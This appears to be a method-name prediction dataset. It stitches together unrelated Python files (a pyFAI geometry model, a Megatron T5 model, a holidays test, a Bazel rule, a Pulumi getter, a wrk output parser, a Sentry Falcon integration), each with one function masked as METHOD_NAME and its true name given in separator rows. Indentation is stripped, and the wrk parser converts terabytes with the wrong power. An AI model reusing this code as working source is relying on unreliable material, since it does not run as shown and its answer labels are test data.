# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
__authors__ = ["V. Valls"]
__license__ = "MIT"
__date__ = "16/10/2020"
from .AbstractModel import AbstractModel
from .ConstraintModel import ConstraintModel
class GeometryConstraintsModel(AbstractModel):
def __init__(self, parent=None):
super(GeometryConstraintsModel, self).__init__(parent)
self.__distance = ConstraintModel(self)
self.__wavelength = ConstraintModel(self)
self.__poni1 = ConstraintModel(self)
self.__poni2 = ConstraintModel(self)
self.__rotation1 = ConstraintModel(self)
self.__rotation2 = ConstraintModel(self)
self.__rotation3 = ConstraintModel(self)
self.__distance.changed.connect(self.wasChanged)
self.__wavelength.changed.connect(self.wasChanged)
self.__poni1.changed.connect(self.wasChanged)
self.__poni2.changed.connect(self.wasChanged)
self.__rotation1.changed.connect(self.wasChanged)
self.__rotation2.changed.connect(self.wasChanged)
self.__rotation3.changed.connect(self.wasChanged)
def isValid(self):
if not self.__distance.isValid():
return False
if not self.__wavelength.isValid():
return False
if not self.__poni1.isValid():
return False
if not self.__poni2.isValid():
return False
if not self.__rotation1.isValid():
return False
if not self.__rotation2.isValid():
return False
if not self.__rotation3.isValid():
return False
return True
def distance(self):
return self.__distance
def wavelength(self):
return self.__wavelength
def poni1(self):
return self.__poni1
def poni2(self):
return self.__poni2
def rotation1(self):
return self.__rotation1
def METHOD_NAME(self):
return self.__rotation2
def rotation3(self):
return self.__rotation3
def copy(self, parent=None):
"""
Copy this model to a new model
:param qt.QObject parent: Parent of the copyed model
:rtype: GeometryConstraintsModel
"""
model = GeometryConstraintsModel(parent=parent)
model.distance().set(self.__distance)
model.wavelength().set(self.__wavelength)
model.poni1().set(self.__poni1)
model.poni2().set(self.__poni2)
model.rotation1().set(self.__rotation1)
model.METHOD_NAME().set(self.__rotation2)
model.rotation3().set(self.__rotation3)
return model
def set(self, other):
"""Set this geometry constraints with the other informations.
:param GeometryConstraintsModel other:
"""
self.lockSignals()
self.distance().set(other.distance())
self.wavelength().set(other.wavelength())
self.poni1().set(other.poni1())
self.poni2().set(other.poni2())
self.rotation1().set(other.rotation1())
self.METHOD_NAME().set(other.METHOD_NAME())
self.rotation3().set(other.rotation3())
self.unlockSignals()
def fillDefault(self, other):
"""Fill unset values of this model with the other model
:param GeometryConstraintsModel other:
"""
self.lockSignals()
self.distance().fillDefault(other.distance())
self.wavelength().fillDefault(other.wavelength())
self.poni1().fillDefault(other.poni1())
self.poni2().fillDefault(other.poni2())
self.rotation1().fillDefault(other.rotation1())
self.METHOD_NAME().fillDefault(other.METHOD_NAME())
self.rotation3().fillDefault(other.rotation3())
self.unlockSignals()
def __str__(self):
template = "GeometryConstraintsModel(d:%s, w:%s, p1:%s, p2:%s, r1:%s, r2:%s, r3:%s)"
data = self.distance(), self.wavelength(), self.poni1(), self.poni2(), self.rotation1(), self.METHOD_NAME(), self.rotation3()
return template % data | null |
set input tensor | # Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
"""T5 model."""
import torch
from megatron import get_args
from megatron.core import tensor_parallel
from megatron.model.enums import AttnMaskType
from megatron.model.language_model import parallel_lm_logits, get_language_model
from megatron.model import LayerNorm
from megatron.model.utils import (
openai_gelu,
get_linear_layer
)
from .module import MegatronModule
def t5_extended_attention_mask(attention_mask_list):
def attn_mask_postprocess(attn_mask):
# [b, 1, s, s]
extended_attention_mask = attn_mask.unsqueeze(1)
return extended_attention_mask
return [attn_mask_postprocess(attn_mask) for attn_mask in attention_mask_list]
def t5_position_ids(token_ids):
# Create position ids
seq_length = token_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long,
device=token_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(token_ids)
return position_ids
class T5LMHead(MegatronModule):
"""Masked LM head for T5
Arguments:
mpu_vocab_size: model parallel size of vocabulary.
parallel_output: wether output logits being distributed or not.
"""
def __init__(self, mpu_vocab_size, parallel_output):
super(T5LMHead, self).__init__()
self.bias = torch.nn.Parameter(torch.zeros(mpu_vocab_size))
self.bias.model_parallel = True
self.bias.partition_dim = 0
self.bias.stride = 1
self.parallel_output = parallel_output
def forward(self, hidden_states, word_embeddings_weight):
output = parallel_lm_logits(hidden_states,
word_embeddings_weight,
self.parallel_output,
bias=self.bias)
return output
class T5Model(MegatronModule):
"""T5 Language model."""
def __init__(self,
config,
num_tokentypes=0,
parallel_output=True,
pre_process=True,
post_process=True,
add_encoder=True,
add_decoder=True):
super().__init__(config=config)
args = get_args()
self.fp16_lm_cross_entropy = args.fp16_lm_cross_entropy
self.parallel_output = parallel_output
self.pre_process = pre_process
self.post_process = post_process
self.add_encoder = add_encoder
self.add_decoder = add_decoder
self.language_model, self._language_model_key = get_language_model(
config=config,
num_tokentypes=num_tokentypes,
add_pooler=False,
add_encoder=add_encoder,
add_decoder=add_decoder,
encoder_attn_mask_type=AttnMaskType.padding,
pre_process=self.pre_process,
post_process=self.post_process)
self.initialize_word_embeddings()
if self.post_process and self.add_decoder:
self.lm_head = T5LMHead(
self.shared_embedding_or_output_weight().size(0),
parallel_output)
self._lm_head_key = 'lm_head'
def METHOD_NAME(self, input_tensor):
"""See megatron.model.transformer.set_input_tensor()"""
self.language_model.METHOD_NAME(input_tensor)
def forward(self, encoder_input_ids, decoder_input_ids, encoder_attn_mask,
decoder_attn_mask, encoder_decoder_attn_mask,
tokentype_ids=None, lm_labels=None, enc_hidden_states=None):
# Converting the attention masks to proper parameter settings
encoder_attn_mask, decoder_attn_mask, encoder_decoder_attn_mask = t5_extended_attention_mask(
[encoder_attn_mask, decoder_attn_mask, encoder_decoder_attn_mask])
encoder_position_ids = t5_position_ids(encoder_input_ids)
decoder_position_ids = t5_position_ids(decoder_input_ids)
lm_output = self.language_model(encoder_input_ids,
encoder_position_ids,
encoder_attn_mask,
decoder_input_ids,
decoder_position_ids,
decoder_attn_mask,
encoder_decoder_attn_mask,
tokentype_ids=tokentype_ids,
enc_hidden_states=enc_hidden_states)
if self.post_process and self.add_decoder:
decoder_output, encoder_output = lm_output
# Output. [s, b, h]
lm_logits = self.lm_head(decoder_output,
self.shared_embedding_or_output_weight())
if lm_labels is None:
# [s b h] => [b s h]
return lm_logits.transpose(0,1).contiguous()
else:
# [b s] => [s b]
lm_labels = lm_labels.transpose(0,1).contiguous()
if self.fp16_lm_cross_entropy:
assert lm_logits.dtype == torch.half
lm_loss = tensor_parallel.vocab_parallel_cross_entropy(lm_logits, lm_labels)
else:
lm_loss = tensor_parallel.vocab_parallel_cross_entropy(lm_logits.float(),
lm_labels)
# [s b] => [b s]
lm_loss = lm_loss.transpose(0,1).contiguous()
return lm_loss
elif self.add_decoder and not self.add_encoder:
decoder_output, encoder_output = lm_output
return decoder_output
else:
encoder_output = lm_output
return encoder_output
def state_dict_for_save_checkpoint(self, prefix='', keep_vars=False):
"""For easy load when model is combined with other heads,
add an extra key."""
state_dict_ = {}
state_dict_[self._language_model_key] \
= self.language_model.state_dict_for_save_checkpoint(prefix=prefix,
keep_vars=keep_vars)
if self.post_process and self.add_decoder:
state_dict_[self._lm_head_key] \
= self.lm_head.state_dict_for_save_checkpoint(prefix=prefix,
keep_vars=keep_vars)
# Save word_embeddings.
if self.post_process and not self.pre_process and self.add_decoder:
state_dict_[self._word_embeddings_for_head_key] \
= self.word_embeddings.state_dict(prefix=prefix,
keep_vars=keep_vars)
return state_dict_
def load_state_dict(self, state_dict, strict=True):
"""Customized load."""
self.language_model.load_state_dict(
state_dict[self._language_model_key], strict=strict)
if self.post_process and self.add_decoder:
self.lm_head.load_state_dict(state_dict[self._lm_head_key],
strict=strict)
# Load word embeddings.
if self.post_process and not self.pre_process and self.add_decoder:
self.word_embeddings.load_state_dict(
state_dict[self._word_embeddings_for_head_key], strict=strict) | null |
test no holidays | # python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Authors: dr-prodigy <[email protected]> (c) 2017-2023
# ryanss <[email protected]> (c) 2014-2017
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from holidays.countries.russia import Russia, RU, RUS
from tests.common import TestCase
class TestRussia(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass(Russia, years=range(1991, 2025))
def test_country_aliases(self):
self.assertCountryAliases(Russia, RU, RUS)
def METHOD_NAME(self):
self.assertNoHolidays(Russia(years=1990))
def test_special_holidays(self):
self.assertHoliday(
"2023-02-24",
"2023-05-08",
)
def test_new_year(self):
name_1 = "Новый год"
name_2 = "Новогодние каникулы"
self.assertHolidayName(name_1, (f"{year}-01-01" for year in range(1991, 2005)))
self.assertHolidayName(name_1, (f"{year}-01-02" for year in range(1993, 2005)))
self.assertNoHoliday(f"{year}-01-02" for year in range(1991, 1992))
for year in range(2005, 2025):
self.assertHolidayName(
name_2,
f"{year}-01-01",
f"{year}-01-02",
f"{year}-01-03",
f"{year}-01-04",
f"{year}-01-05",
)
for year in range(2013, 2025):
self.assertHolidayName(name_2, f"{year}-01-06", f"{year}-01-08")
for year in range(1991, 2005):
self.assertNoHoliday(f"{year}-01-03", f"{year}-01-04", f"{year}-01-05")
for year in range(1991, 2013):
self.assertNoHoliday(f"{year}-01-06", f"{year}-01-08")
self.assertNoHolidayName(name_1, range(2005, 2025))
self.assertNoHolidayName(name_2, range(1991, 2005))
def test_christmas_day(self):
self.assertHolidayName(
"Рождество Христово", (f"{year}-01-07" for year in range(1991, 2025))
)
def test_defender_of_fatherland_day(self):
name = "День защитника Отечества"
self.assertHolidayName(name, (f"{year}-02-23" for year in range(2002, 2025)))
self.assertNoHoliday(f"{year}-02-23" for year in range(1991, 2002))
self.assertNoHolidayName(name, range(1991, 2002))
def test_international_womens_day(self):
self.assertHolidayName(
"Международный женский день", (f"{year}-03-08" for year in range(1991, 2025))
)
def test_labor_day(self):
name_1 = "День международной солидарности трудящихся"
name_2 = "Праздник Весны и Труда"
self.assertHolidayName(name_1, "1991-05-01", "1991-05-02")
self.assertHolidayName(name_2, (f"{year}-05-01" for year in range(1992, 2025)))
self.assertHolidayName(name_2, (f"{year}-05-02" for year in range(1992, 2005)))
self.assertNoHoliday(f"{year}-05-02" for year in range(2005, 2025))
self.assertNoHolidayName(name_1, range(1992, 2025))
self.assertNoHolidayName(name_2, 1991)
def test_victory_day(self):
self.assertHolidayName("День Победы", (f"{year}-05-09" for year in range(1991, 2025)))
def test_russia_day(self):
name_1 = "День принятия Декларации о государственном суверенитете Российской Федерации"
name_2 = "День России"
self.assertHolidayName(name_1, (f"{year}-06-12" for year in range(1992, 2002)))
self.assertHolidayName(name_2, (f"{year}-06-12" for year in range(2002, 2025)))
self.assertNoHoliday("1991-06-12")
self.assertNoHolidayName(name_1, 1991, range(2002, 2025))
self.assertNoHolidayName(name_2, range(1991, 2002))
def test_unity_day(self):
name = "День народного единства"
self.assertHolidayName(name, (f"{year}-11-04" for year in range(2005, 2025)))
self.assertNoHoliday(f"{year}-11-04" for year in range(1991, 2005))
self.assertNoHolidayName(name, range(1991, 2005))
def test_october_revolution(self):
name_1 = "Годовщина Великой Октябрьской социалистической революции"
name_2 = "День согласия и примирения"
self.assertHolidayName(name_1, (f"{year}-11-07" for year in range(1991, 1996)))
self.assertHolidayName(name_1, "1991-11-08")
self.assertHolidayName(name_2, (f"{year}-11-07" for year in range(1996, 2005)))
self.assertNoHoliday(f"{year}-11-07" for year in range(2005, 2025))
self.assertNoHoliday(f"{year}-11-08" for year in range(1992, 2025))
self.assertNoHolidayName(name_1, range(1996, 2025))
self.assertNoHolidayName(name_2, range(1991, 1996), range(2005, 2025))
def test_2018(self):
self.assertHolidays(
Russia(years=2018),
("2018-01-01", "Новогодние каникулы"),
("2018-01-02", "Новогодние каникулы"),
("2018-01-03", "Новогодние каникулы"),
("2018-01-04", "Новогодние каникулы"),
("2018-01-05", "Новогодние каникулы"),
("2018-01-06", "Новогодние каникулы"),
("2018-01-07", "Рождество Христово"),
("2018-01-08", "Новогодние каникулы"),
("2018-02-23", "День защитника Отечества"),
("2018-03-08", "Международный женский день"),
("2018-05-01", "Праздник Весны и Труда"),
("2018-05-09", "День Победы"),
("2018-06-12", "День России"),
("2018-11-04", "День народного единства"),
)
def test_l10n_default(self):
self.assertLocalizedHolidays(
("2018-01-01", "Новогодние каникулы"),
("2018-01-02", "Новогодние каникулы"),
("2018-01-03", "Новогодние каникулы"),
("2018-01-04", "Новогодние каникулы"),
("2018-01-05", "Новогодние каникулы"),
("2018-01-06", "Новогодние каникулы"),
("2018-01-07", "Рождество Христово"),
("2018-01-08", "Новогодние каникулы"),
("2018-02-23", "День защитника Отечества"),
("2018-03-08", "Международный женский день"),
("2018-05-01", "Праздник Весны и Труда"),
("2018-05-09", "День Победы"),
("2018-06-12", "День России"),
("2018-11-04", "День народного единства"),
)
def test_l10n_en_us(self):
self.assertLocalizedHolidays(
"en_US",
("2018-01-01", "New Year Holidays"),
("2018-01-02", "New Year Holidays"),
("2018-01-03", "New Year Holidays"),
("2018-01-04", "New Year Holidays"),
("2018-01-05", "New Year Holidays"),
("2018-01-06", "New Year Holidays"),
("2018-01-07", "Christmas Day"),
("2018-01-08", "New Year Holidays"),
("2018-02-23", "Fatherland Defender's Day"),
("2018-03-08", "International Women's Day"),
("2018-05-01", "Holiday of Spring and Labor"),
("2018-05-09", "Victory Day"),
("2018-06-12", "Russia Day"),
("2018-11-04", "Unity Day"),
) | null |
impl | # Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a test rule that asserts the number of output files in another rule.
This rule operates in Bazel's analysis phase, not in its execution phase, and so
it's faster than a conventional test rule would be.
Furthermore this rule's action does not depend on any of the inputs (because the
assertion is done in the analysis phase) so Bazel won't even build the input
files to run the test. The test has constant execution time.
=== Use ===
Use this rule to assert the size of a filegroup or any other rule and catch
sudden, unexpected changes in the size.
The `margin` attribute allows specifying a tolerance value (percentage), to
allow for organic, expected growth or shrinkage of the target rule.
=== Example ===
The "resources_size_test" test fails if the number of files in
"resources" changes from 123 by more than 3 percent:
filegroup(
name = "resources",
srcs = glob(["**"]) + [
"//foo/bar:resources"
"//baz:resources",
],
)
rule_size_test(
name = "resources_size_test",
src = ":resources",
# Expect 123 files in ":resources", with an error margin of 3% to allow
# for slight changes.
expect = 123,
margin = 3,
)
"""
def METHOD_NAME(ctx):
if ctx.attr.expect < 0:
fail("ERROR: rule_size_test.expect must be positive")
if ctx.attr.margin < 0 or ctx.attr.margin > 100:
# Do not allow more than 100% change in size.
fail("ERROR: rule_size_test.margin must be in range [0..100]")
if ctx.attr.expect == 0 and ctx.attr.margin != 0:
# Allow no margin when expecting 0 files, to avoid division by zero.
fail("ERROR: rule_size_test.margin must be 0 when " +
"rule_size_test.expect is 0")
amount = len(ctx.attr.src[DefaultInfo].files.to_list())
if ctx.attr.margin > 0:
if amount >= ctx.attr.expect:
diff = amount - ctx.attr.expect
else:
diff = ctx.attr.expect - amount
if ((diff * 100) // ctx.attr.expect) > ctx.attr.margin:
fail(("ERROR: rule_size_test: expected %d file(s) within %d%% " +
"error margin, got %d file(s) (%d%% difference)") % (
ctx.attr.expect,
ctx.attr.margin,
amount,
(diff * 100) // ctx.attr.expect,
))
elif amount != ctx.attr.expect:
fail(("ERROR: rule_size_test: expected exactly %d file(s), got %d " +
"file(s)") % (ctx.attr.expect, amount))
if ctx.attr.is_windows:
test_bin = ctx.actions.declare_file(ctx.label.name + ".bat")
# CreateProcessW can launch .bat files directly as long as they are NOT
# empty. Therefore we write a .bat file with a comment in it.
ctx.actions.write(
output = test_bin,
content = "@REM dummy",
is_executable = True,
)
else:
test_bin = ctx.actions.declare_file(ctx.label.name + ".sh")
ctx.actions.write(
output = test_bin,
content = "#!/bin/sh",
is_executable = True,
)
return [DefaultInfo(executable = test_bin)]
_rule_size_test = rule(
implementation = METHOD_NAME,
attrs = {
# The target whose number of output files this rule asserts. The number
# of output files is the size of the target's DefaultInfo.files field.
"src": attr.label(allow_files = True),
# A non-negative integer, the expected number of files that the target
# in `src` outputs. If 0, then `margin` must also be 0.
"expect": attr.int(mandatory = True),
# A percentage value, in the range of [0..100]. Allows for tolerance in
# the difference between expected and actual number of files in `src`.
# If 0, then the target in `src` must output exactly `expect` many
# files.
"margin": attr.int(mandatory = True),
# True if running on Windows, False otherwise.
"is_windows": attr.bool(mandatory = True),
},
test = True,
)
def rule_size_test(name, **kwargs):
_rule_size_test(
name = name,
is_windows = select({
"@bazel_tools//src/conditions:windows": True,
"//conditions:default": False,
}),
**kwargs
) | null |
type | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetIntegrationAccountAssemblyResult',
'AwaitableGetIntegrationAccountAssemblyResult',
'get_integration_account_assembly',
'get_integration_account_assembly_output',
]
@pulumi.output_type
class GetIntegrationAccountAssemblyResult:
"""
The assembly definition.
"""
def __init__(__self__, id=None, location=None, name=None, properties=None, tags=None, METHOD_NAME=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if METHOD_NAME and not isinstance(METHOD_NAME, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", METHOD_NAME)
@property
@pulumi.getter
def id(self) -> str:
"""
The resource id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Gets the resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.AssemblyPropertiesResponse':
"""
The assembly properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
The resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def METHOD_NAME(self) -> str:
"""
Gets the resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetIntegrationAccountAssemblyResult(GetIntegrationAccountAssemblyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetIntegrationAccountAssemblyResult(
id=self.id,
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
METHOD_NAME=self.METHOD_NAME)
def get_integration_account_assembly(assembly_artifact_name: Optional[str] = None,
integration_account_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetIntegrationAccountAssemblyResult:
"""
Get an assembly for an integration account.
Azure REST API version: 2019-05-01.
:param str assembly_artifact_name: The assembly artifact name.
:param str integration_account_name: The integration account name.
:param str resource_group_name: The resource group name.
"""
__args__ = dict()
__args__['assemblyArtifactName'] = assembly_artifact_name
__args__['integrationAccountName'] = integration_account_name
__args__['resourceGroupName'] = resource_group_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:logic:getIntegrationAccountAssembly', __args__, opts=opts, typ=GetIntegrationAccountAssemblyResult).value
return AwaitableGetIntegrationAccountAssemblyResult(
id=pulumi.get(__ret__, 'id'),
location=pulumi.get(__ret__, 'location'),
name=pulumi.get(__ret__, 'name'),
properties=pulumi.get(__ret__, 'properties'),
tags=pulumi.get(__ret__, 'tags'),
METHOD_NAME=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_integration_account_assembly)
def get_integration_account_assembly_output(assembly_artifact_name: Optional[pulumi.Input[str]] = None,
integration_account_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetIntegrationAccountAssemblyResult]:
"""
Get an assembly for an integration account.
Azure REST API version: 2019-05-01.
:param str assembly_artifact_name: The assembly artifact name.
:param str integration_account_name: The integration account name.
:param str resource_group_name: The resource group name.
"""
... | null |
wrk data | #!/usr/bin/python3
import sys
import re
import subprocess
wrkcmd = 'wrk'
separator = ';'
def METHOD_NAME(wrk_output):
return str(wrk_output.get('lat_avg')) + separator + str(wrk_output.get('lat_stdev')) + separator + str(
wrk_output.get('lat_max')) + separator + str(wrk_output.get('req_avg')) + separator + str(
wrk_output.get('req_stdev')) + separator + str(wrk_output.get('req_max')) + separator + str(
wrk_output.get('lat_distrib_50%')) + separator + str(wrk_output.get('lat_distrib_75%')) + separator + str(
wrk_output.get('lat_distrib_90%')) + separator + str(wrk_output.get('lat_distrib_99%')) + separator + str(
wrk_output.get('bytes_sec_tot')) + separator + str(wrk_output.get('req_sec_tot')) + separator + str(
wrk_output.get('tot_requests')) + separator + str(wrk_output.get('tot_duration')) + separator + str(wrk_output.get('err_connect')) + separator + str(
wrk_output.get('err_read')) + separator + str(wrk_output.get('err_write')) + separator + str(
wrk_output.get('err_timeout'))
def get_bytes(size_str):
x = re.search("^(\d+\.*\d*)(\w+)$", size_str)
if x is not None:
size = float(x.group(1))
suffix = (x.group(2)).lower()
else:
return size_str
if suffix == 'b':
return size
elif suffix == 'kb' or suffix == 'kib':
return size * 1024
elif suffix == 'mb' or suffix == 'mib':
return size * 1024 ** 2
elif suffix == 'gb' or suffix == 'gib':
return size * 1024 ** 3
elif suffix == 'tb' or suffix == 'tib':
return size * 1024 ** 3
elif suffix == 'pb' or suffix == 'pib':
return size * 1024 ** 4
return False
def get_number(number_str):
x = re.search("^(\d+\.*\d*)(\w*)$", number_str)
if x is not None:
size = float(x.group(1))
suffix = (x.group(2)).lower()
else:
return number_str
if suffix == 'k':
return size * 1000
elif suffix == 'm':
return size * 1000 ** 2
elif suffix == 'g':
print(size)
return size * 1000 ** 3
elif suffix == 't':
return size * 1000 ** 4
elif suffix == 'p':
return size * 1000 ** 5
else:
return size
return False
def get_ms(time_str):
x = re.search("^(\d+\.*\d*)(\w*)$", time_str)
if x is not None:
size = float(x.group(1))
suffix = (x.group(2)).lower()
else:
return time_str
if suffix == 'us':
return size / 1000
elif suffix == 'ms':
return size
elif suffix == 's':
return size * 1000
elif suffix == 'm':
return size * 1000 * 60
elif suffix == 'h':
return size * 1000 * 60 * 60
else:
return size
return False
def parse_wrk_output(wrk_output):
retval = {}
for line in wrk_output.splitlines():
x = re.search("^\s+Latency\s+(\d+\.\d+\w*)\s+(\d+\.\d+\w*)\s+(\d+\.\d+\w*).*$", line)
if x is not None:
retval['lat_avg'] = get_ms(x.group(1))
retval['lat_stdev'] = get_ms(x.group(2))
retval['lat_max'] = get_ms(x.group(3))
x = re.search("^\s+Req/Sec\s+(\d+\.\d+\w*)\s+(\d+\.\d+\w*)\s+(\d+\.\d+\w*).*$", line)
if x is not None:
retval['req_avg'] = get_number(x.group(1))
retval['req_stdev'] = get_number(x.group(2))
retval['req_max'] = get_number(x.group(3))
x = re.search("^\s+(\d+)\ requests in (\d+\.\d+\w*)\,\ (\d+\.\d+\w*)\ read.*$", line)
if x is not None:
retval['tot_requests'] = get_number(x.group(1))
retval['tot_duration'] = get_ms(x.group(2))
retval['read'] = get_bytes(x.group(3))
x = re.search("^Requests\/sec\:\s+(\d+\.*\d*).*$", line)
if x is not None:
retval['req_sec_tot'] = get_number(x.group(1))
x = re.search("^Transfer\/sec\:\s+(\d+\.*\d*\w+).*$", line)
if x is not None:
print(x.group(1))
retval['bytes_sec_tot'] = get_bytes(x.group(1))
x = re.search(
"^\s+Socket errors:\ connect (\d+\w*)\,\ read (\d+\w*)\,\ write\ (\d+\w*)\,\ timeout\ (\d+\w*).*$", line)
if x is not None:
retval['err_connect'] = get_number(x.group(1))
retval['err_read'] = get_number(x.group(2))
retval['err_write'] = get_number(x.group(3))
retval['err_timeout'] = get_number(x.group(4))
x = re.search("^\s+Latency Distribution\s+50%\s+(\d+.\d+\w+)\s+75%\s+(\d+.\d+\w+)\s+90%\s+(\d+.\d+\w+)\s+99%\s+(\d+.\d+\w+).*$", wrk_output, re.M)
if x is not None:
retval['lat_distrib_50%'] = get_ms(x.group(1))
retval['lat_distrib_75%'] = get_ms(x.group(2))
retval['lat_distrib_90%'] = get_ms(x.group(3))
retval['lat_distrib_99%'] = get_ms(x.group(4))
if 'err_connect' not in retval:
retval['err_connect'] = 0
if 'err_read' not in retval:
retval['err_read'] = 0
if 'err_write' not in retval:
retval['err_write'] = 0
if 'err_timeout' not in retval:
retval['err_timeout'] = 0
return retval
def execute_wrk(cmd):
cmd = ' '.join([str(elem) for elem in cmd])
cmd = wrkcmd + ' ' + str(cmd)
process = subprocess.run(cmd.split(' '), check=True, stdout=subprocess.PIPE, universal_newlines=True)
output = process.stdout
return output
def main(cmd):
print("****wrk output: \n")
wrk_output = execute_wrk(cmd)
print(str(wrk_output) + "\n")
print("****wrk output dict: \n")
wrk_output_dict = parse_wrk_output(wrk_output)
print(str(wrk_output_dict) + "\n")
print("****wrk output csv line: \n")
wrk_output_csv = METHOD_NAME(wrk_output_dict)
print(str(wrk_output_csv))
if __name__ == '__main__':
main(sys.argv[1:]) | null |
set transaction name and source | from __future__ import absolute_import
from sentry_sdk.hub import Hub
from sentry_sdk.integrations import Integration, DidNotEnable
from sentry_sdk.integrations._wsgi_common import RequestExtractor
from sentry_sdk.integrations.wsgi import SentryWsgiMiddleware
from sentry_sdk.tracing import SOURCE_FOR_STYLE
from sentry_sdk.utils import (
capture_internal_exceptions,
event_from_exception,
parse_version,
)
from sentry_sdk._types import TYPE_CHECKING
if TYPE_CHECKING:
from typing import Any
from typing import Dict
from typing import Optional
from sentry_sdk._types import EventProcessor
# In Falcon 3.0 `falcon.api_helpers` is renamed to `falcon.app_helpers`
# and `falcon.API` to `falcon.App`
try:
import falcon # type: ignore
from falcon import __version__ as FALCON_VERSION
except ImportError:
raise DidNotEnable("Falcon not installed")
try:
import falcon.app_helpers # type: ignore
falcon_helpers = falcon.app_helpers
falcon_app_class = falcon.App
FALCON3 = True
except ImportError:
import falcon.api_helpers # type: ignore
falcon_helpers = falcon.api_helpers
falcon_app_class = falcon.API
FALCON3 = False
class FalconRequestExtractor(RequestExtractor):
def env(self):
# type: () -> Dict[str, Any]
return self.request.env
def cookies(self):
# type: () -> Dict[str, Any]
return self.request.cookies
def form(self):
# type: () -> None
return None # No such concept in Falcon
def files(self):
# type: () -> None
return None # No such concept in Falcon
def raw_data(self):
# type: () -> Optional[str]
# As request data can only be read once we won't make this available
# to Sentry. Just send back a dummy string in case there was a
# content length.
# TODO(jmagnusson): Figure out if there's a way to support this
content_length = self.content_length()
if content_length > 0:
return "[REQUEST_CONTAINING_RAW_DATA]"
else:
return None
if FALCON3:
def json(self):
# type: () -> Optional[Dict[str, Any]]
try:
return self.request.media
except falcon.errors.HTTPBadRequest:
return None
else:
def json(self):
# type: () -> Optional[Dict[str, Any]]
try:
return self.request.media
except falcon.errors.HTTPBadRequest:
# NOTE(jmagnusson): We return `falcon.Request._media` here because
# falcon 1.4 doesn't do proper type checking in
# `falcon.Request.media`. This has been fixed in 2.0.
# Relevant code: https://github.com/falconry/falcon/blob/1.4.1/falcon/request.py#L953
return self.request._media
class SentryFalconMiddleware(object):
"""Captures exceptions in Falcon requests and send to Sentry"""
def process_request(self, req, resp, *args, **kwargs):
# type: (Any, Any, *Any, **Any) -> None
hub = Hub.current
integration = hub.get_integration(FalconIntegration)
if integration is None:
return
with hub.configure_scope() as scope:
scope._name = "falcon"
scope.add_event_processor(_make_request_event_processor(req, integration))
TRANSACTION_STYLE_VALUES = ("uri_template", "path")
class FalconIntegration(Integration):
identifier = "falcon"
transaction_style = ""
def __init__(self, transaction_style="uri_template"):
# type: (str) -> None
if transaction_style not in TRANSACTION_STYLE_VALUES:
raise ValueError(
"Invalid value for transaction_style: %s (must be in %s)"
% (transaction_style, TRANSACTION_STYLE_VALUES)
)
self.transaction_style = transaction_style
@staticmethod
def setup_once():
# type: () -> None
version = parse_version(FALCON_VERSION)
if version is None:
raise DidNotEnable("Unparsable Falcon version: {}".format(FALCON_VERSION))
if version < (1, 4):
raise DidNotEnable("Falcon 1.4 or newer required.")
_patch_wsgi_app()
_patch_handle_exception()
_patch_prepare_middleware()
def _patch_wsgi_app():
# type: () -> None
